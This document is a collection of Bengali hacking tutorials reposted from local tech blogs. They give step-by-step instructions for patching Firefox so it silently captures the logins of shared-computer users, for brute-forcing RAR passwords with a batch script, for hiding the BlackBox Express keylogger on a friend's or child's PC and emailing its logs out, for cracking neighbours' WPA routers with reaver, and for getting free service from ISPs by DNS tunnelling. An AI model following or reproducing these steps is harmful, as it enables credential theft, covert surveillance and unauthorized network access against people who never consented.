ভার্সিটির ল্যাব কিংবা সাইবার ক্যাফের ইউজারদের হ্যাক করুন মজিলা ফায়ারফক্সকে ফাঁদ বানিয়ে

সূত্র : http://www.pchelplinebd.com/archives/113103

অনেক দিন পর লিখতে বসলাম। সবাই নিশ্চয়ই ভাল আছেন?
আজও যথারীতি হ্যাকিং নিয়ে লিখব। আজকে আমি দেখাব মজিলা ফায়ারফক্সকে হ্যাকিং ফাঁদ বানিয়ে কিভাবে ভিকটিমের ইমেইল ও পাসওয়ার্ড বের করে নেয়া হয়। এই পদ্ধতিতে যারা সাইবার ক্যাফে কিংবা ভার্সিটির ল্যাব বিশেষ করে পাবলিক প্লেইস গুলোতে ফেসবুক, ইমেইল আইডি ব্যবহার করেন তাদেরকেই ভিক্টিম বানানো যাবে। প্রথেমে বলে নেই এটা শুধু জানার জন্য, কেউ অনৈতিক কাজে ব্যবহার করবেন না, আমার নিজের কিছু সর্বজান্তা টাইপের ফ্রেন্ড আছে যারা নিজের অজান্তে এই পদ্ধতিতে আমার কাছে ভিক্টিম হয়ে আছেন, উনাদের সমবেদনাসরূপ পোস্টটি উৎসর্গ করলাম। 
এবার দেখে নিন কিভাবে কাজটি করা হয়ঃ
যা যা লাগবেঃ
১. Winrar এর নাম তো শুনেছেন, না শুনলে হ্যাকিং আপনার জন্য না, টিভি স্টার্ট করে রেসলিং বা সিরিয়াল দেখেন :p। এটা পিসিতে Installed থাকা চাই।
২. Mozilla Firefox ব্রাউজার তো লাগবেই।
৩. Notepad++ ও লাগবে।
আর কিছু লাগবে না, মনোযোগ দিয়ে নিচের স্টেপ গুলো ফলো করেন-
-আপনার পিসির এই লোকেসনে যান- C:/ ড্রাইভ-Program files(x86) ফোল্ডার-Mozilla Firefox ফোল্ডার। এইবার থামেন, আর যাওয়া লাগবে না।
-নিচের দিকে তাকান, দেখবেন একটি Omni.ja নামক ফাইল আছে। এই শালাকে নিয়েই কাজ করতে হবে।
-এই Omni.ja কে আলাদা আলাদা ড্রাইভে কপি করে রাখেন। একটা নিয়ে কাজ করব, অন্যটা ব্যাকআপ হিসেবে থাকবে।
-এবার omni.ja তে মাউজের রাইট বাটনে ক্লিক করে properties select করুন। এবার Opens with এর পাশে change এ ক্লিক করে Winrar-কে সিলেক্ট করে দিন।
-এখন এটি অপেন করুন, extract to বাটনে ক্লিক করে Ok-তে ক্লিক দিন। এর ফলে omni.ja file-টি ঐ লোকেসনে omni folder-তে extract হবে।
-এবার Winrar এ যে নতুন উইন্ডো অপেন হবে সেখানে বাম দিকে Omni নামে যে ফোল্ডার দেখতে পাবেন সেখান হতে নিম্নোক্ত লোকেসনে যান-omni\jsloader\resource\gre\components\ ।
একটা ছবি দিয়ে দেই, নতুবা প্যাচ লাগিয়ে ফেলবেন, দেখুন নিচের ছবিটি-

-এবার components এর উপর মাউস রেখে রাইট বাটনে ক্লিক করে অপেন করুন। যে নতুন উইন্ডো অপেন হবে সেখানে নিচের দিকে nsLoginManagerPrompter.js নামে যে ফাইলটি দেখতে পাবেন সেটি ডিলিট করে দিবেন। নিচের ছবিটি দেখুন-

-এখন ক্লোজ করে Winrar ফাইলটি আবার অপেন করুন। এবার এই omni\components\ লোকেসনে যান। খেয়াল করে দেখুন এটা কিন্তু আগের লোকেসন না, নতুন লোকেসন, অনেকে এখানে প্যাচ লাগিয়ে দেন। আবার আগের মত components ফাইলটির রাইট বাটনে ক্লিক করে যে sLoginManagerPrompter.js  ফাইলটি পাবেন সেটি  notepad++ এ অপেন করেন।
-এবার কীবোর্ডের ctrl+F এ প্রেস করে এই showSaveLoginNotification : function লাইনটি সার্চ করুন। এখন মনোযোগ দিয়ে দেখুন এই লাইনের ঠিক নিচে বাম দিকের 771 নাম্বার পয়েন্ট হতে নিচের দিকের 872 নাম্বার পয়েন্ট পর্যন্ত যতগুলো কোড আছে সবগুলো মার্ক করে নিম্নোক্ত কোডটি রিপ্লেস করুন।
var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);

-এখন সেভ করে ক্লোজ করে দিন।
-আবার এটি অপেন করুন। সব কিছু সিলেক্ট করে রাইট বাটনে ক্লিক করে add to archive দিন। পড়ে যে নতুন উইন্ডো অপেন হবে সেখানে Archive name টি চেঞ্জ করে omni.ja লিখে Ok-তে ক্লিক দিন। এবার দেখবেন ঐ Winrar ফোল্ডারে omni.ja নামে একটি ফাইল তৈরী হয়েছে। এই ফাইলটি কপি করে ক্লোজ করে দিন। নিচের ছবিটি ধারাবাহিকভাবে দেখুন-

-এবার কপি করা পাজি ফাইলটি আপনার পিসির নিমোক্ত লোকেসনে গিয়ে পাস্ট করে দিন। রিপ্লেস চাইলে রিপ্লেস দিন।
-এখন Mozilla Firefox অপেন করে option হতে security তে যান, সেখানে remember passwords for sites এ মার্ক করে ok দিয়ে বের হয়ে আসুন।
ব্যাস, কাজ শেষ।
এবার পরীক্ষা করে দেখবেন না? ফেসবুক কিংবা ইমেইলে লগইন করুন। দেখবেন মজিলা ব্রাউজার আপনার মত পাজি হয়ে গেছে, আপনার পারমিশন ছাড়াই আপনার ইউজার নেম আর পাসওয়ার্ড তার এই option>security>saved password জায়গায় সেভ করে রেখে দিছে।

জিপ/রার ফাইলের পাসওয়ার্ড বের করুন কোন রকম সফটওয়্যার ছাড়াই !

সূত্র : http://www.pchelplinebd.com/archives/84350

আসসালামু আলাইকুম ।

আশাকরি আল্লাহর রহমতে সবাই ভালো আছেন । আজ অনেক দিন পর ব্লগে ফিরে এলাম ।কিছুদিন যাবত ভাবছিলাম

লিখবো ।আজ হঠাত  নাসির ভাই  ফোন করে বললেন আবার আগের মত শুরু করতে ।যেই কথা সেই কাজ ।

কিন্তু অনেকদিনে মাথায় অনেক জং ধরে গেছে ।তাই তেমন কোন অসাধারন টিপস দিতে পারছি না ।

সাধারন কিছু নিয়েই এলাম । আজকে আমরা দেখবো কিভাবে সফটওয়্যার ছাড়াই রার/জিপ ফাইলের পাসওয়ার্ড রিকভারি করা যায় ।

আমরা অনেকেই পাসওয়ার্ডওয়ালা জিপ/রার ফাইল নিয়ে সমস্যায় পড়ি মাঝে মাঝে ।

পাসওয়ার্ড  উদ্ধার করতে নানা সফটওয়্যারের সাহায্য নিই ।কিন্তু এ জটিল কাজটি আপনি কোন রকম জটিলতা ছাড়াই সিম্পল একটি নোটপ্যাড ট্রিকসের মাধ্যমে করতে পারেন ।

তাহলে আর কি দরকার আজ্যাইরা রিকোভার  সফটওয়্যারের ? 

তাহলে আসুন কাজ শুরু করি -

প্রথমে নোটপ্যাড খুলুন-

নিচের কোডটি কপি পেস্ট করুন নোটপ্যাডে-

REM ==================================================
REM www.pchelplinebd.com
@echo off
color B
title Rar Password Cracker By pchelplinebd.com
mode con: cols=47 lines=20
copy "C:\Program Files\WinRAR\Unrar.exe" 
SET PASS=0
SET TMP=TempFold
MD %TMP%
:RAR
cls
echo ----------------------------------------------
echo                   GET DETAIL
echo ----------------------------------------------
echo.
SET/P "NAME=Enter File Name  : "
IF "%NAME%"=="" goto NERROR
goto GPATH
:NERROR
echo ----------------------------------------------
echo                      ERROR
echo ----------------------------------------------
echo Sorry you can't leave it blank.
pause
goto RAR
:GPATH
SET/P "PATH=Enter Full Path : "
IF "%PATH%"=="" goto PERROR
goto NEXT
:PERROR
echo ----------------------------------------------
echo                      ERROR
echo ----------------------------------------------
echo Sorry you can't leave it blank.
pause
goto RAR
:NEXT
IF EXIST "%PATH%\%NAME%" GOTO SP
goto PATH
:PATH
cls
echo ----------------------------------------------
echo                     ERROR
echo ----------------------------------------------
echo Opppss File does not Exist..
pause
goto RAR
:SP
echo.
echo Generating Password...
echo. 
:START
title Cracking Password...
SET /A PASS=%PASS%+1
echo %RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%
UNRAR E -INUL -P%PASS% "%PATH%\%NAME%" "%TMP%"
IF /I %ERRORLEVEL% EQU 0 GOTO FINISH
GOTO START
:FINISH
RD %TMP% /Q /S
Del "Unrar.exe" 
cls
title Password Found
echo ----------------------------------------------
echo                     CRACKED
echo ----------------------------------------------
echo.
echo PASSWORD FOUND!
echo FILE  = %NAME%
echo CRACKED PASSWORD = %PASS%
echo this cracker created by KHALED MAHMUD KHAN
echo all rights reserved by www.pchelplinebd.com
pause>NUL
exit
REM ==================================================

File/Save as অপশনে গিয়ে Crack Pass Recover.bat  নামে ফাইলটি সেভ করুন-

খেয়াল করুন যেখানে নোটপ্যাডটি সেভ করেছেন সেখানে উক্ত নামে একটি আলাদা (bat) ফাইল তৈরী

হয়েছে ।ঠিক এরকম-

উক্ত ফাইলটি ওপেন করুন এবং -

হহহ

Enter Full Name অংশে আপনার পাসওয়ার্ড দেয়া রার/জিপ ফাইলটির নাম লিখুন সঠিক বানানে ।

যেমন আমি এখানে যে ফাইলটির পাসওয়ার্ড উদ্ধার করবো তার নাম Hiren Boot CD

এরপর ইন্টার চাপুন ।

Enter Full Path অংশে ফাইলটির  লোকেশন দেখিয়ে দিন ।যেমন আমার ফাইলটি ছিলো সি ড্রাইভে ।

তাই লোকেশন হয়েছে C:/

লোকেশন দেখিয়ে ইন্টার চাপুন ।এখন একটু ওয়েট করুন ।এরকম একটি স্কীন আসবে -

পাসওয়ার্ড উদ্ধার কাজ শুরু হয়েছে ।মনে রাখবেন , ফাইলের সাইজ যত বড় হবে উদ্ধার কাজে সময় তত বেশী লাগবে । তারপর দেখুন অবশেষে -

Password Found ! আইমিন পাসওয়ার্ডটি পাওয়া গেছে 

দেখলেন তো কত সহজে হয়ে গেলো 

যারা এতসব গুতাগুতি আইমিন নোটপ্যাডে কাজ করার মত কষ্টটুকটু করতে চান না তাদের জন্য

ফাইলটি আপলোড করে দিলাম । এখানে ক্লীক করে নামিয়ে নিন

আজ এ পর্যন্তই ।কেমন লাগলো জানাবেন ।

পরিশেষে ,

বেশ কয়েকমাস আগে আমার বাবা মারা গেছেন ।

তারপর থেকে আমি অনলাইন জগতের বাইরেই আছি ।

কোন কিছুই আর আগের মত ভাল লাগে না ।এই যে আজ লিখতে বসলাম সেটাও নাসির ভাইয়ের অনরোধেই ।

ভালোই লাগলো ।কিছুটা সময় তো মনটা অন্যদিকে দিতে পারলাম ।

যদি কোন ভুল হয়ে থাকে মাফ করবেন ।

একটা সময় অনেকদিন ধরে আমিই ছিলাম পিসি হেলপলাইনের সেরা লেখকের তালিকায় ।

বলা যায় তখন তেমন কম্পিটিশনই ছিলো না ।এখন যে আর সেরার দৌড়ে যেতে পারবো না সেটা আমার বোঝা হয়ে গেছে ।কারন এখনকার সবাই এত ভালো লেখে যে তাদের কাছে আমি কিছুই না ।

সবাইকে ধন্যবাদ । ভালো থাকবেন ।আল্লাহ হাফেজ ।

“The BlackBox Express” এক্সক্লুসিভ কীলগার :: হ্যাক করুন আপনার বন্ধু , ছোট ভাই বোন বা বাচ্চাদের কম্পিউটার ও তাদের উপর নজরদারি করুন

সূত্র : http://www.techtunes.com.bd/hacking/tune-id/265076

প্রিয় টেকটিউনসের সবাইকে শুভেচ্ছা । আশা করি সবাই ভাল আছেন । আর ভাল না থাকলেও আজ ভাল হয়ে যান এই কামনা করি । আমিও মোটামুটি ভাল আছি । আজ আমি আপনাদের একটি খুবই শক্তিশালী পিসি মনিটরিং সফটওয়্যার এর সাথে পরিচয় করিয়ে দেব , যেটাকে আপনারা অনেক ভাল ও খারাপ কাজে ব্যাবহার করতে পারবেন । তবে আশা করি এটাকে ভাল কাজেই ব্যাবহার করবেন ।

সফটওয়্যার টার নাম হল “BlackBox Express” । এটা খুবই শক্তিশালী একটা মনিটরিং সফটওয়্যার । এর মাধ্যমে আপনারা যে সব কাজ করতে পারবেন তা নীচে ধাপে ধাপে বর্ণনা করছি ।

প্রথমে এই সফটওয়্যারটা এইখান থেকে ডাউনলোড করে নিন । তারপর এটা চিরাচরিত নিয়ম অনুসারে ইনস্টল করুন ।তবে এর আগে আপনার এন্টিভাইরাস টি সাইলেন্ট বা গেমিং মোডে নিয়ে নিন ।  ইনস্টল করার পর এটা রান করান । তখন দেখবেন এটি অটোমেটিকলি আপনার সামনে পিসি এড করার একটা উইন্ডো এনে হাজির করেছে । সেখান থেকে লোকাল কম্পিউটার সিলেক্ট করে নেক্সট চাপুন । ব্যাস , আপনার পিসিতে কাজ শুরু করে দিল এই সফটওয়্যারটা । আর অটোমেটিক উইন্ডো না আসলে আপনি নিচের চিত্রের মত করে এড কম্পিউটার এ ক্লিক করে তারপর চিত্রের মত কাজ করুন ।

এবার দেখুন এটা দিয়ে আপনি কী কী কাজ করতে পারবেন সেটা । এটা দিয়ে আপনি মূলত যে কাজ গুলি করতে পারবেন তা হল :

১. আপনার পিসির প্রতি মুহূর্তের স্ক্রীণ , মানে আপনার ডেক্সটপ স্ক্রীনে কখন কী কাজ হয়েছে সেটা দেখতে পারবেন ।

২. আপনার পিসির প্রতিটি কী স্ট্রোক , কোন ইউজার কখন কোন কীবোর্ডের কী টি চাপছে সেটা ।

৩. আপনার পিসিতে কখন কোন প্রোগ্রাম ইউজ করা হয়েছে তা দেখতে পারবেন ।

৪. আপনার পিসির  মাধ্যমে কোন কোন ওয়েব সাইট ভিজিট করা হয়েছে সেটা দেখতে পারবেন ।

৫. আপনার পিসি থেকে কোথায় কোন ইমেইল গেছে বা ইমেইল এসেছে তা দেখতে পারবেন ।

৬. আপনার পিসিতে যে আই এম চ্যাট গুলো করা হয়েছে সেগুলো দেখতে পারবেন ।

এগুলো ছাড়াও অনেক কাজ আছে যেগুলো আপনি এই সফটওয়্যার এর মাধ্যমে করতে পারবেন । সেগুলো আপনি ইউজ করতে করতে বুঝে যাবেন ।

যাই হোক , এখন দেখি এই তথ্য গুলো আপনি কীভাবে দেখবেন ও সেগুলো কাজ করবেন । সবাই প্রথমে নীচের চিত্রটার দিকে খেয়াল করুন ।

দেখুন , সবার উপরে আছে লাল চিহ্নিত ঘরের মধ্যে আপনার উপরের কাজগুলোর নোটিফিকেশন বার । এখান থেকে আপনি উপরের তথ্যগুলো জেনে নিতে পারবেন । এই বার গুলোর উপর ক্লিক করলে উপরের চিত্রের মত নীচে আপনাকে তথ্যগুলো সো করবে । তারপর দেখেন , নীচের নোটিফিকেশন গুলো মূলত দিনের বিভিন্ন সময় এর পিসিতে করা কাজ গুলো । এগুলো মূলত আপনার পিসির কাজগুলো ডিটেইলসে সো করবে । কী স্ট্রোক এ ক্লিক করলে আপনার পিসিতে কখন কোন কী চাপা হয়েছে তা ডিটেইলসে সো করবে । প্রোগ্রামস এ ক্লিক করলে কখন কোন প্রগ্রাম ইউজ হয়েছে তা সো করবে । মেইলে ক্লিক করলে মেইল গুলো সো করবে ।

এরপর এর নীচের লাল চিহ্নিত ঘরে খেয়াল করুন । সেখান থেকে আপনি আপনার সুবিধা মত দিন তারিখ ও সময় সিলেক্ট করে সেই সময়ের কাজগুলো দেখতে পারবেন ।

দেখূন এখান থেকে আমি ১৭ তারিখে ফেসবুকের একটা উইন্ডোতে আমি কী কী কাজ করেছিলাম , মানে কী কী টাইপ করেছিলাম বা কোন কি চেপেছিলাম তা ডিটেইলসে সো করছে ।

এরকম ভাবি আপনি আপনার পিসির সব কাজ গুলোই দেখতে পারবেন বহু দিনের আগের কাজগুলোও ।

এখন আাসি আপনার এ কাজগুলি বা তথ্য গুলি কী ভাবে রিমোটলি দেখবেন সেই বিষয়ে । হ্যা , এ তথ্যগুলি রিমোটলি ও দেখা সম্ভব । এখন আমি দেখাব এই তথ্য গুলো কীভাবে আপনি আপনার মেইলে পাবেন ?

এর জন্য আপনি প্রথমে মেনুবারে সেটিংসে গিয়ে আবার সেটিংসে ক্লিক করুন । সেখান থেকে একদম নিচে নোটিফিকেশন সেটিংস এ যান । তারপর লাল চিহ্নিত “ SMTP server” এ গিয়ে চিত্রের মত লিখুন “smtp.gmail.com” । কারণ আপনি যদি আপনার গুগল মেইলে নোটিফিকেশন পেতে চান তবে সেখানে এটি লিখে দিন । তারপর নীচের ইউজার নেম ও পাসওয়ার্ড এর ঘরে গিয়ে আপনার গুগল মেইল ও পাসওয়ার্ড দিন । তবে এটা অপশনাল । আপনি দিতেও পারেন , আবার নাও দিতে পারেন । এরপর উপরের বামদিকের লাল চিহ্নিত মেইল নোটিফিকেশন সেটিংস এ গিয়ে প্রথম ঘরে আপনার ইমেইল দিন , মানে আপনি যে মেইলে আপনার সব নোটিফিকেশন পেতে চান । তারপর পরের ঘরে গিয়ে আপনি যে মেইল থেকে নোটিফিকেশন বা তথ্য পেতে চান সেটি লিখুন । এখানে আপনি অন্য একটি ইমেইল দিতে পারেন । তবে দিতেই হবে । এরজন্য আপনি একটা নতুন মেইল ও খুলে নিতে পারেন । এরপর আপনি দিনের কোন সময়ে এই নোটিফিকেশন পেতে চান তা উপরের ডান দিকের লাল চিহ্নিত ঘরে গিয়ে সেট করে দিন ।আর টিক চিহ্নিত ঘর গুলোতে টিক মেরে দিন ।  সবকিছু না বুঝলে চিত্রের মত করে কাজ করুন ।

তারপর এসব কাজ করে আপনি “Test” বাটনে ক্লিক করুন । তারফলে আপনার মেইলে একটা ই মেইল যাবে ব্লাক বক্স থেকে ।এই মেইলটা গেলেই বুঝবেন যে আপনি সঠিক ও সুষ্ঠূ ভাবে মেইলে ব্লাকবক্সের নোটিফিকেশন আপডেট এ সাবস্ক্রাইব করতে পেরেছেন ।

এবার আপনি এভাবে সফটওয়্যারটিকে থাকতে দিন । প্রয়োজনে এর শর্টকাট আইকন ডিলিট করে দিন ও অল প্রোগ্রাম থেকে এর আইকন টা ডিলিট করে দিন । ফলে আপনার বন্ধু বা ছোট ভাই এটার উপস্থিতি টের পাবে না । আর এটা কোন নোটিফিকেশন ও সো করে না । ফলে আপনি ভালভাবেই তাদের উপর নজরদারি করতে পারবেন । তাদের ফেসবুক , জিমেইল , ইহাহু , স্কাইপ সহ আরও সব একাউন্টের পাসওয়ার্ড পেয়ে যাবেন । আর এটা যদি রিমোটলি ইনস্টল করতে চান , প্রফেশনাল কীলগার গুলোর মত ,  তবে আপনাকে প্রো ভার্সনে যেতে হবে । আর এটা সম্পূর্ণ একটা বৈধ সফটওয়্যার ।

আর একটা কথা , আসলে এসব বিষয়ে টিউন করে সবাই বলে থাকেন যে , “ এটা দয়া করে কারও ক্ষতির জন্য ব্যাবহার করবেন না । করলে আমি বা টেকটিউনস দায়ী থাকবে না” ।  তবে আমি শুধু পরের অংশটুকু বলি “ এর মাধ্যমে কারও ক্ষতি হলে আমি বা টেকটিউনস দায়ী থাকবে না” । কারণ , আমি বললেও আপনার মনের ইচ্ছাই আপনি বাস্তবায়ন করবেন । সেক্ষেত্রে আমি কিছূই বলব না । এটা আপনার বিবেকের কাছে ।

আর ভাল লাগলে একটু কষ্ট করে কমেন্ট করতে চেষ্টা করবেন । কারণ , এর ফলে টিউনার আরও ভাল টিউন করার উৎসাহ পায় । টিউমেন্টই হল টিউনের প্রাণ ।

সবাই ভাল থাকবেন । ধন্যবাদ ।

ফ্রী ডাউনলোড করে নিন ৭৭০০০ টাকার Wifi Password Recovery সফটওয়্যার সঙ্গে দেখে নিন ব্যাবহারবিধি।

সূত্র : http://www.techtunes.com.bd/download/tune-id/264269

সবাইকে অনেক শুভেচ্ছা। আশা করি সবাই ভালো আছেন। আজকে আমি আপনাদের সাথে শেয়ার করব এমন একটি প্রোফেশনাল হ্যাকিং সফটওয়্যার যার মাধ্যমে দুনিয়ার তাবৎ পাসওয়ার্ড প্রোটেক্টেড ওয়াইফাই নেটওয়ার্কের, পাসওয়ার্ড Recovery করতে পারবেন এবং বিনা মুল্যে পুরো সুবিধা উপভোগ করতে পারবেন। এটি নিয়ে কাজ করার আগে সবার প্রথমে আপনার পিসির এন্টিভাইরাসের প্রোটেকশন  অফ করুন।

এন্টিভাইরাসের প্রোটেকশন করার কথা বলা হয়েছে এই কারনে, কারন এন্টিভাইরাস এটিকে হারমফুল সফটওয়্যার হিসাবে ডিটেক্ট করবে এবং আপনাকে কাজ করতে দিবে না। ডাউনলোড করে নিন Wifi Password Recovery সফটওয়্যারটি।

ডাউনলোড করুনঃ এখন থেকে।

পধতিঃ

•  প্রথমে সফটওয়্যারটি ইন্সটল করুন এবং রান করান। প্রয়োজনীয় ড্রাইভার ইন্সটল করুন।
•  Rules Tab এ যান এবং Enable advanced rules এ টিক দিন।
• Formula বক্সে নিচের কোডটি পেস্ট করুন, tods=1 and dmac=FF:FF:FF:FF:FF:FF (চিত্রের মত) এবং Name বক্সে টাইপ করুন a । তারপর "Add/Edit" ক্লিক করুন।
• এবার Settings এ গিয়ে option ক্লিক করুন।
• Memory Usages Tab এ যান এবং Ok করুন। (maximum packets in buffer ২০০০০ করে দিন)  (যদি রিস্টার্ট চায়,  রিস্টার্ট করুন, মানে প্রোগ্রাম টি ক্লোজ করে আবার চালু করুন)।
• ডান দিকে উপরে তিনটি ফানেল দেখা যাচ্ছে, D লেখা প্রথম ফানেলটি চেক করে বাকি দুটি আনচেক করুন।
•  তারপর Search বাটনটি ক্লিক করুন এবং যে নেটওয়ার্ক টি password recovery করতে চান তা খুজে বের করুন। Channels Tab এ ড্র্যাগ করে সিলেক্ট করুন এবং  Capture বাটন ক্লিক করুন।
•  এখন অন্য যে এডাপ্টার যেটি কোন কিছু Capture করছে না সেটি দিয়ে পাসওয়ার্ড প্রোটেক্টেড নেটওয়ার্কে কানেক্ট করুন, যখন পাসওয়ার্ড চাইবে তখন আপনার ইচ্ছামত কিছু যেমন 123456 দিয়ে দিন।
• তখন এই মেসেজ দেখাবে Connected with limited connectivity।
• পুনরায় মেইন মেনুতে যান এবং Packets Tab এ যান, সব কিছু ঠিকঠাক থাকলে,  Packet এর Couple দেখতে পারবেন।
• ARP REQ নামের Packet এ রাইট ক্লিক করুন তারপর Send Packet(s) এ গিয়ে Selected ক্লিক করুন। Value গুলি চেঞ্জ করুন। তারপর Send বাটন ক্লিক করুন।
• পুনরায় মেইন মেনুর Rules Tab এ যান এবং আপনার তৈরিকৃত Rule টি আনচেক করুন।
• ২০০০০ Packet সিলেক্ট করুন এবং Save করুন। অবশ্যই মনে রাখবেন যে কথায় এটি সেভ করেছেন। Save as করার সময় ncf ফাইলের পরিবর্তে dump cap ফাইল হিসাবে সেভ করুন।

• Connected ক্লিক করুন আপনার কাংখিত নেটওয়ার্কে।

এই সফটওয়্যার টির ২০ তাঁর মত  Screenshot সহ স্টেপ বাই স্টেপ দেয়া আছে, উপরের মাধ্যমে করতে না পারলে এখান থেকে দেখে নিতে পারেন।

প্রতিবেশীদের WIFI HACK করুণ (এক্সপার্ট দাদাদের জন্য নয়)

সূত্র : http://www.techtunes.com.bd/hacking/tune-id/264240

আমি টিটিতে অনেক দিন ধরেই আছি তবে কখনো সময়ের অভাবে পোস্ট করা হয় নি
ভুল হলে ক্ষমার দৃষ্টিতে দেখবেন
আসুন শুরু করা যাক

এইটা করার জন্য আপনাকে অবশই লিনাক্স এর যে কোন ভার্সন ইন্সটল করে নিতে হবে তবে ভাল হয় যদি (Linux mint,Ubuntu , kbuntu) এসব ভার্সন  ইন্সটল করা থাকে ।

এবার ctrl+alt+t press করুন terminal ওপেন করুন

please install Aircrak-ng

by typing - sudo apt-get install aircrack-ng এইটা লিখে এন্টার করুন যথারীতি আপনার পিসির পাসওয়ার্ড চাইবে পাসওয়ার্ড লিখে এন্টার করুন আর হ্যাঁ এর আগে নেটটা পিসির সাথে connect করতে ভুলবেন না ।

তারপর আবার ইন্সটল করুন Reaver

pls type : sudo apt-get install reaver আবার আগের মত এন্টার চাপার পর  পাসওয়ার্ড চাইবে ,পাসওয়ার্ড  দিন অ্যান্ড  এন্টার

এবার নেট connection অফ করে পিসি restart করুন ।

এবার আপনাকে অবশ্যই সামান্য  ধৈর্যর পরীক্ষা দিতে হবে

terminal ত ওপেন ই আছে না থাকলে ওপেন করে নিন টাইপ করুন

sudo airmon-ng start waln0 লিখে এন্টার করন পাস কোড চাইবে দিন

দেখবেন নিচে একটা লেখা আসবে ( monitor mode enabled on mon1/mon0/mon4)

ব্যাস হয়ে গেল প্রথম স্টেপ

please type : sudo airodump-ng mon0   (এখানে MONO র সাথে zero hobe )

এবার আপনি  দেখবেন আশে পাশের ওয়াইফাই র নেট গল শো করছে screen shot অনুযায়ী

now final step

press cntrl+c

sudo reaver -i mon0 -b (your desired bssid)  -vv -d 0 -S

example :  sudo reaver -i mon0 -b C8:3A:35:26:D5:31 -vv -d 0 -s

press enter  and wait for while,  then u will show after some time

like this

wps pin:25452006

wps psk:sakkhor /whatever they used their name as network

ap ssid : tplink /tenda/whaterver they used

enjoy !!!!!!!!!!! enjoy!!!!!!!!! enjoy!!!!!!!!

THIS WILL BE WORKED ON THIS TYPE NETWORK WPA/WPA2 TYPE NETWORK

IF ANY PROBLEM COMMENTS MUST

বাংলালায়ন, কিউবি, ওলো, টেলিটক থ্রিজি সহ দেশের যেকোন ISP কে হ্যাক করুন (Advanced Users Only)

সূত্র : http://www.techtunes.com.bd/hacking/tune-id/255666

কি খবর আপনাদের? আমার খবর ভালো না, আগের আইডি ব্যান করা হইসে কোন নোটিশ ছাড়াই!

যাই হোক, কথা বাড়াবো না। আজকে আমি আপনাদেরকে বাংলাদেশ এর যেকোন ISP কে হ্যাক করার টেকনিক শেখাব। এজন্য আমাদের যা যা লাগবেঃ

১) একটা VPS (With any Linux based distro installed)
২) মাথায় কিছু বুদ্ধি! 

আপনি বছরে ১৫০০০-১৬০০০ হাজার টাকায় একটা VPS কিনে মোট ৭০ টা লাইন/Modem/Sim/Connection ফ্রিতে চালাতে পারবেন।

This Tutorial is only for Advanced Users. Send me friend requestand then Join in this group if you are a normal user and want free internet. ফ্রেন্ড রিকোয়েস্ট না পাঠালে গ্রুপে এপ্রভ করা হবে না!

মেথডঃ

প্রথমে আপনাকে একটি fake DNS server বানাতে হবে। প্রথমে এখানে যান http://freedns.afraid.org/signup

এবার নিচের মত করে একটা ফ্রি ডোমেন ক্রিয়েট করেনঃ

In the Type: choose NS
Subdomain : any name you want.
Domain : choose one, in this case I use us.to as my domain
if there is no us.to option, click the menu Registry in the left pane.
Destination : make any destination domain name, we need to configure it later.
এখন সেভ করুন।

এখন আমাদেরকে Destination কনফিগার করতে হবে, যেটা আমরা আগে বানিয়ে ছিলাম.
সাবডোমেনটাকে VPS. এখানে VPS এর আইপি বসাতে হবে। নিচের আরেকটা New সাব-ডোমেন ক্রিয়েট করেনঃ

In the Type: choose A
Subdomain: adjust with the name of the DESTINATION in the first step above
Domain : adjust with the domain name in the first step, if we choose us.to as the domain name, the we should choose us.to. If we choose moo.com in the first step, then this Domain MUST be moo.com too.
Destination : type here the IP address of our server(VPS IP)

ফাইনাল রেজাল্ট হবে নিচের মতঃ

এবার আপনার VPS এ লগিন SSH অথবা Putty দিয়ে লগিন করেন।
SSH নিচের মত কমান্ড দিনঃ

yum install iodine (For CentOS)
apt-get install iodine (For Debian)

এখন আয়োডিন Start করুন নিচের কমান্ড দিয়েঃ

iodined -f 10.0.0.1 -P yourpasswordhere whatever.us.to

কিছু কথা :

ক) yourpasswordhere এর জায়গায় আপনার পাসওয়ারড দিন।

খ) whatever.us.to এর জায়গায় আপনার DNS Server এর ঠিকানা দিন। (যেটা আমরা সাবডোমেন হিসেবে বানিয়েছিলাম)

এখন http://code.kryo.se/iodine/check-it/ লিঙ্ক এ গিয়ে আপনার DNS Server দিন এবং দেখে আসুন তা কাজ করছে কিনা।

এখন যদি কোন এরর না দেখায়, তাহলে আপনার কাজ প্রায় শেষ। এবার আপনাকে ক্লায়ান্ট সেটাপ দিতে হবে।

প্রথমে এটা http://code.kryo.se/iodine/iodine-0.6.0-rc1-win32.zip ডাউনলোড করেন। এটাকে ডেস্কটপে extract করেন। এবার Windows key + R চেপে রান ওপেন করুন। এবার cmd টাইপ করে এন্টার চাপুন। এবার এই কমান্ড দিনঃ

cd desktop/iodine-0.6.0-rc1-win32/bin

এবার নিচের কমান্ড দিনঃ

iodine -f -P yourpasswordhere whatever.us.to (whatever.us.to এর জায়গায় আপনার ডোমেন দিন)

যদি সব ঠিক থাকে তাহলে নিচের মত মেসেজ পাবেনঃ

Opening device Local Area Connection 2
Opened UDP socket
Opened UDP socket
Opened UDP socket
Sending DNS queries for whatever.us.to to 1.2.3.4
Autodetecting DNS query type (use -T to override).
Using DNS type NULL queries
Version ok, both using protocol v 0x00000502. You are user #0
Enabling interface 'Local Area Connection 2'
Setting IP of interface 'Local Area Connection 2' to 10.0.0.2 (can take a few seconds)...

Server tunnel IP is 10.0.0.1
Testing raw UDP data to the server (skip with -r)
Server is at 1.2.3.4, trying raw login: OK
Sending raw traffic directly to 1.2.3.4
Connection setup complete, transmitting data.

আপনাকে এখন Putty ইন্সটল করে নিচের Photo এর মত কনফিগার করতে হবে:

এখন আপনাকে Putty ব্যবহার করে IP 10.0.0.1 এ প্রবেশ করতে হবে এবং আপনার login details যা আপনি VPS এ ইউজ করেন তা ইউজ করতে হবে।
এখন MOZILLA/BROWSER/IDM/Software এ  PROXY SETTINGS এ 127.0.0.1 , PORT 9999 দিতে হবে।

এখন হেব্বি ফ্রি নেট চালান!! 

কিছু কথাঃ

